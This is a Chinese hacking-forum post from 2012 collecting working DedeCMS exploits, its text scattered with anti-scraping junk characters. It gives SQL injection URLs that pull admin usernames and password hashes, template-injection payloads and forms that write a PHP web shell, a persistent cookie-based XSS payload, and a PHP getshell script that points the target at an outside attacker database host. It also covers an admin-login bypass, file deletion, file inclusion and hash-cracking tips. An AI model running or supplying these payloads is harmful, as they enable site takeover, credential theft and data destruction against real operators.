找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3148|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
7 N1 p; g/ ]* [0 o9 N
Dedecms 5.6 rss注入漏洞
; j6 j( m2 `6 J% c  S& p
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
* ?( S+ L- g7 X, P, U: K6 I& {* s! \9 v+ g3 B
% w0 h% I; O( y7 a
  r2 k8 k6 h; a

/ G' h/ m8 ]9 d8 r
* c. U% r0 \+ {" q! Y0 J0 T* {
# Z6 v7 F8 _* Z7 y! D$ o4 `2 F: o4 }3 R& P5 k9 ]7 c  N6 ^6 q

$ J+ K' U# }. Z9 }# b" q+ {: jDedeCms v5.6 嵌入恶意代码执行漏洞
. r5 }) F8 v8 P$ s; W注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
# |- P7 t1 Y6 |' m# w# i发表后查看或修改即可执行+ m& a7 L5 ~2 B" g
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}0 {3 Q: \, `& c0 v: F
生成x.php 密码xiao,直接生成一句话。" [4 u: t  @5 V# T' C1 j
% P' Y' p6 M7 g5 T

; X( }% i3 t4 g
% ]) x9 e6 {! }5 ^) |( `2 A
. K, M! b& T2 ~9 c# w% _, F; x5 y. [" u7 m7 @" b" y

# W* _4 X3 L+ ]' W2 A4 `- k
+ V1 d& m0 u- d  I
1 i, o+ B: F5 ^) W4 T. L: n" CDede 5.6 GBK SQL注入漏洞9 I0 k: i3 t* y7 O/ U( a
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';: i; a1 [. i9 C9 L+ [" t
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe4 Y3 A( x+ S9 d4 e4 v4 e
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7. `" m* K0 T( c  w2 l. a+ q

* o0 G7 G8 }6 H+ q5 R# ]2 S# k- V! C) ^, \$ Q6 ?
0 H1 j4 N% p0 J! s( E

& Q  y( K3 p6 B- E& x* g# i! t7 p0 r' g
" |, C9 A- m+ R
' e$ v9 r1 N. v5 ?
# }) i( t8 S: ~; g
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
8 Z2 b# ~, ?, b( p- Z' x& C
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` " B1 r! ]5 ~$ d) J

' ?5 n  n$ D* p7 z1 c9 V  }) h, ~/ ]- z- O+ G3 W$ D3 t/ U
: K8 V3 v3 N" C! Q% }3 o* `

! c% s3 A" L$ f. I. U( b) v& p

' R2 M( \5 I# KDEDECMS 全版本 gotopage变量XSS漏洞
) Z9 }; a  K) Y$ q2 S; m9 k0 N6 m& X1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
. p- i1 h' v3 c) O$ V4 x4 [+ ~
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="! @8 {  [* ]. ^4 y

% l; V9 b. {8 J9 k( Z0 L! J# n" G* G' |, ?1 @
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 / \2 x$ w  P+ G% P! P( K( j5 |
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
7 `/ @+ U+ [! }0 y9 |+ R
* s3 L1 ^/ }6 l- m1 p! C) }' U. X6 t" f$ p8 {3 q5 ^  W" z' a' C
http://v57.demo.dedecms.com/dede/login.php, G' R. K: U- t& ~6 S
9 q3 g7 I7 ~* l( b8 J8 K
; Y& W1 s+ R" S7 T( ?
color=Red]DeDeCMS(织梦)变量覆盖getshell
% W: Y1 F# l$ N$ L" c- }! L$ F; ]& F#!usr/bin/php -w
% L) o* b. _, Q7 z! g<?php3 F- O) c% k; z4 o
error_reporting(E_ERROR);( }% }7 k: t8 R+ c2 d& x5 }) h- j6 t
set_time_limit(0);' ^4 g3 m6 T& d; ]6 N
print_r(', i7 h; @: K. z4 C  D' X
DEDEcms Variable Coverage# V) p0 |! l0 H* }- }
Exploit Author:
www.heixiaozi.comwww.webvul.com5 ?$ q* h1 K1 q4 D
);+ l" G5 }+ T& D' H9 g$ w5 h0 f$ b
echo "\r\n";
- |# N* k% E5 j3 Y. {- Kif($argv[2]==null){
, F7 P, c6 Q* Q: [; \4 P3 Yprint_r('
5 |% ~8 t# e0 |2 r/ D7 D: k+---------------------------------------------------------------------------+
2 R9 c+ X. B1 L. E) d5 IUsage: php '.$argv[0].' url aid path& u! ~) d/ x5 ]) W3 T* d0 d
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: O7 T: s! C2 q9 aExample:, E" @1 ?% Y0 R5 I; A. M/ M( p
php '.$argv[0].'
www.site.com 1 old
, _" _+ k; P! Z2 e1 k+---------------------------------------------------------------------------+7 y1 v7 z' w  s+ M; O
');1 `- A1 R& G" T1 V: O( Q! {
exit;; c0 ?2 m" }/ ]" Q6 O$ a8 T% D
}
% b* t- Q  c8 Z, c! ^# i$url=$argv[1];
  h' Z) A% ?7 M! U- B. M$ k3 T; a$aid=$argv[2];
2 [. I% _3 I" s# w( L9 i$path=$argv[3];: N3 t0 O/ U  K
$exp=Getshell($url,$aid,$path);
" v/ B" l1 B: y9 i* S7 c: |if (strpos($exp,"OK")>12){
0 R. `: L8 P/ d3 k, ]6 R, Becho "
& [: K# f  W% a& ]. rExploit Success \n";; E0 M# ?/ q- H/ }. Q1 v7 X
if($aid==1)echo "
' N5 `) x  u+ l" C, @# f4 \8 h2 DShell:".$url."/$path/data/cache/fuck.php\n" ;, b$ p. h5 D$ t& m9 }  F
9 }7 k3 I0 ~2 |6 N# b

# n3 p8 s4 Y/ M( \9 \# nif($aid==2)echo "
! d3 E& b: `+ d4 @+ [( {! l1 L8 CShell:".$url."/$path/fuck.php\n" ;1 ?0 e" a& C+ {' E6 N

( Z/ _0 \- L( E! {+ \1 ?3 ?# G0 F" L2 j& ~$ `( n( y
if($aid==3)echo "
0 t% h/ l1 @* U7 G3 yShell:".$url."/$path/plus/fuck.php\n";7 O, u; h$ z$ ]1 N. j: J

5 i% I0 ~. V0 y! [7 x9 p4 C" |8 D: ^- w( k. J1 u
}else{
: Y& q" u9 s' e! D+ Necho "
# s' V$ K3 W1 |. v0 _5 m: HExploit Failed \n";4 I# m7 O6 y9 s. @! Z* w; K
}
' V/ t/ V$ K1 k3 yfunction Getshell($url,$aid,$path){6 E8 k  @: L) u8 E6 a1 K6 L
$id=$aid;9 ~9 Z( I* N3 F& j+ N- M
$host=$url;
' j4 a4 {* o* ^$port="80";
# D8 `6 W7 l  w/ q/ ^  o$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
  r& _, ^# M7 C* X6 v  W$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
  z0 p9 D" ]( z' b' s) O% ?$data .= "Host: ".$host."\r\n";, I$ G1 H; m' d0 ?2 V
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
0 b& f5 q* p" D+ G+ G$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";/ B  w8 t0 y) N/ ^; X7 G& h
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";/ K) D3 j: H+ x, r5 {8 u
//$data .= "Accept-Encoding: gzip,deflate\r\n";& u8 `8 |/ Z) Y& u- O/ W7 j$ K( R
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";4 X) e* j/ Y* v1 _  J8 V
$data .= "Connection: keep-alive\r\n";/ E# Q2 ?: }9 g: R
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";0 Z# j4 |, d" z$ Z' T% J* b
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";0 `+ S% |' K2 H2 p6 ~
$data .= $content."\r\n";
% U  h" }& _+ }2 M8 ^7 G* n$ock=fsockopen($host,$port);
* r% X4 V3 y8 Z' N9 C* Gif (!$ock) {
  S4 e  u( ]( d  T8 q$ Hecho "7 h3 J, E! l. g/ a% t/ l: |
No response from ".$host."\n";* o9 X5 E! w% H9 W; |
}
* H( q5 p" w, s$ [8 Pfwrite($ock,$data);
' [; z8 q2 E9 f! i0 swhile (!feof($ock)) {: n8 p4 s0 E* ]% S% C. Z) L/ M5 J
$exp=fgets($ock, 1024);
& H) C  Y' w8 }1 G/ Freturn $exp;* }0 _# i- o, W
}
- V7 V* F& C0 f}# V, R3 C$ a/ N& |

) r" L2 }0 K) d* L6 Z3 }; Q) h. P7 n0 x* N' y, Z) v: e
?>
+ y6 N0 f( _3 E" o' w  a; h" }+ C* e9 V+ H

3 R3 ]+ e8 H1 Q/ [1 g
1 D& V, q- s  q1 V
  a" N. N3 I- ^) V1 C
5 d  ~7 a" ^1 r; @8 l' w" p  H- i8 O& N
+ M9 |5 i( W, I4 {. a

+ U. U5 n0 p  T3 P6 w3 O8 m; k/ y& F7 V  t
1 T7 p5 Z& P5 b
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)6 L! O( M- Z3 j4 j$ [+ _% J
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
3 g( B3 {1 Z+ @; ~6 _6 L; U8 [+ m' m! g
4 t4 Y: E: N/ w- M5 U
把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ w/ h" Z/ t9 o; d+ J/ C" R! v
, r9 \2 ~: V# D2 F- {( ]2 A' H" s
8 x; J, g( w  I8 Y# R" c6 U; ~
此漏洞的前提是必须得到后台路径才能实现9 T- I# T/ o! j% Z
. {! u# D; `* n0 _' n3 A

( ^2 P# k5 |& I) Q- X# D3 o$ P, d6 K$ _

, L- M% a' M8 ^$ J3 k# w- Q4 y& ^( l, f) H# h" F
2 ~7 S: n# J% ~' R5 R
( T3 N4 X5 g8 \, m3 F; x( G* q

0 Y6 S1 T  ~' K- D+ b* h5 ]6 B; J) d: y

& ?; _: ^9 A- a# g5 kDedecms织梦 标签远程文件写入漏洞
; L* X" N9 ]6 T! J& a- g5 I, J前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');1 b% {6 m( T. h3 z4 f: }3 T
. b0 H: c' z% R1 L
" n$ u! a& H6 _! I* ~6 C5 ?
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 $ P% k# U  y$ E6 n0 a
<form action="" method="post" name="QuickSearch" id="QuickSearch">' F/ Y9 ^9 @2 l" {
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! Y$ `7 ?# W& R/ c- P/ L9 B<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! _- p4 L8 G0 d7 r9 y. k1 |
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />% \( P; m/ t. d& N% H1 g9 f' [
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
% A' ~+ z0 t0 W' J4 g  l' p<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
& g$ ^* ?6 |# T' A<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
" j7 e( H: D  X<input type="text" value="true" name="nocache" style="width:400">1 @4 _" A8 V) i" p( g
<input type="submit" value="提交" name="QuickSearchBtn"><br />, X- K  ]3 F0 T. C  N7 t
</form>
( {3 l) b! l9 s4 p4 D, K* {<script>5 ^9 U& b1 O; {
function addaction()
1 L; J( C8 m7 u- }, \{* I3 F( F3 O# `$ O
document.QuickSearch.action=document.QuickSearch.doaction.value;
5 a8 _- E% Z2 n3 T2 H* |}( f1 i: v1 [0 Z4 F
</script>+ A+ ~2 P' R! m  b" t

' A9 _: _3 p* S. N' H2 B  c8 _2 a2 l
0 `2 i3 R+ `& S( T/ l7 g4 g1 C7 i

) }, o* B0 Q' v% D) n0 h, ^9 [& O0 S! S7 S9 z
8 Y# I+ [! M4 B. x' o7 p

- s1 g2 m" N  i% H: `5 Q& c8 f
$ q9 g) Q7 G0 ]+ G4 j- ~2 U  u, H4 G2 D# j& i

* T/ l8 ?8 U. N1 U9 N6 pDedeCms v5.6 嵌入恶意代码执行漏洞1 [* z, _+ q$ V5 B& e' I
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
' l3 H9 L3 z' d, V( I7 da{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}* i4 H6 ~. g7 E+ M- m0 W2 L: _% r
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得* B; K' c  c, |2 y
Dedecms <= V5.6 Final模板执行漏洞6 M! ~0 ~8 U, A6 }5 R! U
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
+ D, S$ f# |2 N! e% s4 V; Iuploads/userup/2/12OMX04-15A.jpg
7 ]5 x$ _. r# C$ h$ i$ u$ r7 k" A! }, l* ~7 }# {- ]. q
+ y3 {6 ^% S9 S
模板内容是(如果限制图片格式,加gif89a):( L2 W4 z- M9 }& F7 D
{dede:name runphp='yes'}+ j- \  j' P% \. R
$fp = @fopen("1.php", 'a');
# h, N; P$ ~6 |& V@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");- Y% I0 {( j$ o$ e
@fclose($fp);
" }" J& u: j+ ]1 E% X  |{/dede:name}+ t. t; F9 o% p/ |% V4 G. d! I7 M; F8 d
2 修改刚刚发表的文章,查看源文件,构造一个表单:
$ v; k$ W/ e7 ^: c0 y% M4 u<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
; D, a8 _0 M% h<input type="hidden" name="dopost" value="save" />
$ Z/ }  \4 Q" {" d: t<input type="hidden" name="aid" value="2" />
8 B  e* b7 L1 Q# S9 r4 Z& g<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
0 p) Z( [- d( k" ^4 \<input type="hidden" name="channelid" value="1" />% T* O, R2 \0 f
<input type="hidden" name="oldlitpic" value="" />2 J1 g* d) A+ B
<input type="hidden" name="sortrank" value="1275972263" />
  Q8 b+ r3 G9 ~; P. T( R4 S' U( u4 |$ p3 U3 i: ]5 q
7 x' b( Q( m! u
<div id="mainCp">1 g% h$ A/ o3 Z+ M6 Q1 T2 i# p
<h3 class="meTitle"><strong>修改文章</strong></h3>) z2 d& T  ^$ f7 U7 S, q

& B* O: s" x5 Y4 W4 e9 G
: n6 n# ]4 ?) l" Q% A% O<div class="postForm">: `9 A* J4 z! F- A! p. F+ ^
<label>标题:</label>! k% I" U  J( `" @
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>% C. E# t! j( E+ `; @5 z0 ?/ L
6 k0 n! E6 d* g% g
( {6 D7 ?, W" f- Z" W
<label>标签TAG:</label>$ r0 [1 h6 w; d) y2 ]% e/ t. f
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
2 l1 P3 h# f* d& \9 \) R3 U( @! \% W3 d: n
9 x3 w& R$ N  q
<label>作者:</label>' D* |7 x- V. K+ D/ \
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
6 h$ [$ _) ]6 d% z# P
2 b# J. k4 b8 R. o6 M. D
' b1 z3 x1 ^& u' r<label>隶属栏目:</label>
6 @9 Q, \* U. a- ]  |! c* d, [. r<select name='typeid' size='1'>0 `2 ?3 l8 h( F% k4 i( `
<option value='1' class='option3' selected=''>测试栏目</option>2 V3 p5 j- `4 u% [8 o
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)* T: s4 d, B' V( O: O

$ }  ^- o$ V0 R) d
* e" Y3 u& R% ]3 a/ O% K- B4 i* ~  Z<label>我的分类:</label>, q. ~# I0 u/ Y: q
<select name='mtypesid' size='1'>
% Q) ^4 D- i  \) U+ p<option value='0' selected>请选择分类...</option>
# g+ G: s. N' L<option value='1' class='option3' selected>hahahha</option>
' J& w3 `2 q8 u8 b$ }1 s; `</select>
# c6 Q9 [' u0 k5 L/ q+ L$ M8 \
. D# {. v- o! }& X$ [5 M
/ E3 X# j5 D2 Q5 N9 Y& p<label>信息摘要:</label>
/ L* N- v) @1 s# k3 `% h<textarea name="description" id="description">1111111</textarea>
  e# }  U: n( F# e3 I(内容的简要说明)1 ]; M1 y4 E" M% \0 E+ O& V5 G# }
& i0 E2 f; V! w( x

" q9 k- C# l! r7 P/ o7 G$ ~/ v<label>缩略图:</label>' h; C, b: C; o' E: B" E+ W: \
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
8 j6 u; o3 A6 h) ]1 H% D
2 n$ h2 D9 W1 i5 S  X# B
% V' e* V/ f0 g' _0 B0 M: z<input type='text' name='templet'& W! g# D: ^& g0 E7 F7 @) w" @
value="../ uploads/userup/2/12OMX04-15A.jpg">
, E  p  i$ }, L2 n% j. Q! p<input type='text' name='dede_addonfields') G* u! l* O1 U6 V
value="templet,htmltext;">(这里构造)
1 \1 {2 h6 u* q. E</div>8 d& l, [2 r5 o3 Q$ U

! T" [8 J6 x* T  i  V
) A  W2 h( f9 F<!-- 表单操作区域 -->
) U, j) ]! @3 y) \% q- H<h3 class="meTitle">详细内容</h3>, a% p, R, m$ P- x

4 S* r( h1 j. @* ~2 p9 `( k4 i& A; d5 ]' n
<div class="contentShow postForm">
- C0 {" ]$ p1 Y<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>  z! s6 r- B7 g
3 o9 o# H1 D5 `% `  X' q- T

' r; v5 f& |0 b2 d# L& I; R! a<label>验证码:</label>7 }# t; t: `9 _/ [4 o( A
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />& Z' ~7 o  S% q. y. {% Z6 v
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
1 x& g2 @$ N; X+ U) r* E3 @
- d% @% ]( z' n
: c8 w0 ~: ~4 X$ [" }% a& v<button class="button2" type="submit">提交</button>, g9 V. N; {) \9 g" `# s6 _# C
<button class="button2 ml10" type="reset">重置</button>
5 S$ x- Z$ c5 [0 F$ v* c</div>* H4 P' h) w; W: o! L) j" l" ]

) e2 K( J5 K+ a: |- \; v6 e8 X- }1 G( N$ g
</div>  ~+ x* t# g1 q5 v. Z; g
$ k; Z: h+ o4 F! F
+ t9 [4 u) W  e5 t& N* |% L) |
</form>
- K" }1 V& q4 p/ O
% L  B6 V) D3 Y+ y' c. S5 v
: Y  O! j2 p4 x6 S提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:$ }6 N0 ^3 r. k5 S+ ?
假设刚刚修改的文章的aid为2,则我们只需要访问:2 }3 ~6 z- @2 H1 I& E2 O
http://127.0.0.1/dede/plus/view.php?aid=28 s2 W0 A( v4 \6 g0 O& h$ Q5 R
即可以在plus目录下生成webshell:1.php
; a' `7 {* p" ?( ?& b% C! l
$ g, j* _& s7 y0 V: O$ z9 t+ J. Q, ]

5 l- y' n9 p' T9 Q: ?  m: y  T4 S, G; h0 a- i
7 t3 O  P  V0 b" B
7 l6 G- C) h6 }; s: v

+ F' O( z9 f6 K$ ]1 P
8 J4 J! E/ d6 _6 N) ~4 C) J* w# f: R# G" e9 {% W3 w' M7 @

8 R1 U9 t: w  |: w4 u+ Z& E9 ?4 A8 q/ o+ E2 _, {* i& W! z: V

* N; V# p" g) W* y( C4 CDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ M. z  A) m9 u  b) FGif89a{dede:field name='toby57' runphp='yes'}
9 b& a8 D! C! t2 _5 e5 V1 {" Sphpinfo();! N6 \! H9 K5 x/ I5 j9 _
{/dede:field}
, Q; J# r* E' U. J1 }  D; ?保存为1.gif3 |) w  F& S& q' O' _  K- P8 E3 ?
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
" L2 t  Y7 L# U9 g' u* ~# D2 \<input type="hidden" name="aid" value="7" />
( J: S% N9 Y; @/ q  \$ T/ f3 R<input type="hidden" name="mediatype" value="1" />
7 ~5 @/ ^% C1 q( g, R" A$ ^<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 9 q8 x# s1 R) `- S; V
<input type="hidden" name="dopost" value="save" />
1 e! H7 e* l' h7 H4 R9 G<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
( m& I4 l* a) K$ C8 ?- W$ m. n; o9 E<input name="addonfile" type="file" id="addonfile"/> * B* @$ i4 c* z
<button class="button2" type="submit" >更改</button>
  A0 \+ \  U, O( ^( ]</form>
+ }' u) L2 j7 i0 {! I0 Q/ Z9 A. Z. _1 o
8 a% Y$ g* e* ?& o
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
. l5 f; L; P& e6 f发表文章,然后构造修改表单如下:
6 i  ]! {, o$ t" t
7 w, N4 }8 d3 x! l, {7 y, b) _- |3 m- ?
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
* C# r% z& x+ P  U; Q" j<input type="hidden" name="dopost" value="save" />   r$ y; z0 W( x" q8 G" f
<input type="hidden" name="aid" value="2" /> % u! [$ G8 J  g" ^
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 7 X3 h# A6 ]0 ?/ D7 o
<input type="hidden" name="channelid" value="1" />
/ i7 o' g& l3 I/ Z% f( V3 W<input type="hidden" name="oldlitpic" value="" />
6 c1 Q4 r: `9 L& Q; }<input type="hidden" name="sortrank" value="1282049150" />
8 G, a4 e* W7 ]! U" q0 P) L" Z<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
( H8 c  \) g, f* k<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
) H+ h2 }& i0 S( c, U% u. b8 W0 l0 D<select name='typeid' size='1'>
9 M# ^8 s: d/ R1 R7 g4 q<option value='1' class='option3' selected=''>Test</option> 1 _9 b' M# z% I0 D2 e0 o
<select name='mtypesid' size='1'>
! V! k% h9 f1 N( K<option value='0' selected>请选择分类...</option>
( p# A7 V6 x* _! e6 a<option value='1' class='option3' selected>aa</option></select> ) a0 \% s+ Q; f& C: U" p! Z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
% T) L  P9 V$ o/ H1 E1 [+ x1 `8 y<input type='hidden' name='dede_addonfields' value="templet"> , L. z% g4 ~  ?4 u* I1 Y: Q
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
- H! i) |7 v4 n<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
6 w7 g4 y7 p- G7 o<button class="button2" type="submit">提交</button> ' b7 T+ u! q+ n( S; P
</form>5 k) j2 A: n; u8 M) i8 c
) G! @2 M1 ~$ E  h- p4 M; W
# P- w+ ?! h1 Y' v- o
- k2 o& \. \! y) m2 i5 s; n

, T+ R1 z1 y4 F# n
# x0 u1 E$ R) @0 a( w9 Z* N. z/ V/ w" |; `/ w

! e- b1 Y* f% {8 l" u8 u  w3 i/ G; p) y6 p

0 X$ a+ g* W  F$ ?3 N7 @% f$ m! w5 g
3 m; k2 X) F# E" s' o7 i3 D4 i& B' [* f

/ b# D1 N1 h) C织梦(Dedecms)V5.6 远程文件删除漏洞
8 V5 e! j1 Z9 Q
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
: l, j/ o) f8 B2 [& \& s" Y; m& @; B& [/ N5 X# m8 E  b3 u

0 m% s, F; ?3 Q3 d2 h  ^& C# _4 E$ i* z% z: t$ ]
9 _8 M# }* S# y% j8 d3 s7 Z
/ d8 k1 C  m3 s

1 V5 ]6 m% [: F5 V' w" S) m' m) {5 b3 j% E# I

' a+ S: h1 I0 r
1 @% U/ K  {5 z9 ?( l5 ]1 g' s) U3 b
* \6 T4 e; F: ?织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
, m6 y& E* ?- g2 k
http://www.test.com/plus/carbuya ... urn&code=../../
" S  {. d. m8 j$ r; y. p1 l
) I5 h6 X1 a  p! O. G/ Q
9 ?. k3 A/ @! e6 J; y0 l
# P' m" i- f. g4 k. Q: F+ o8 P! K" j. A1 [% k# N6 R! N) {

# H( }/ l; b9 l
, v1 D: D: Q5 q& r2 C4 b" H( a
- A, J& E/ a) Q+ Y0 S
  [( j$ b5 z( d2 N0 e( x# H3 q: S7 E6 I: _, ]& W7 N
3 {) g& u+ I% ~: i% {
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
) z8 ]6 r" g. t  x+ }2 \plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
3 l! C; a- |0 l* Y; R$ T2 w' N密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
4 e4 |4 ]9 j- W8 ^3 e: f) d' y* Z5 }  J9 _4 X: Q
( H% {2 V5 ^# x7 F
9 T1 [' S8 ~/ ?  v" y& @
! V' p% [+ {" d3 g7 a) x" S

4 N- a* u  V# y& F& a2 {6 L* r% Z( q! F, K. @4 I

7 A, r: t3 F, Z% C9 d
0 ?; e$ m% Z9 y& F
% |% t7 o6 g% j; Z" d
& d5 D! F. @1 S织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
2 h+ q8 t  L; n, H+ p- n* Ehttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='& S3 P' d' t1 F3 |

* ]& n/ }, b2 U6 j) `$ f& g
4 s1 x4 |: e# m2 q* Z0 _5 Z+ O9 h0 h1 ]" Y/ M9 B+ q+ \

# r" d  P( p3 t7 T" b- p
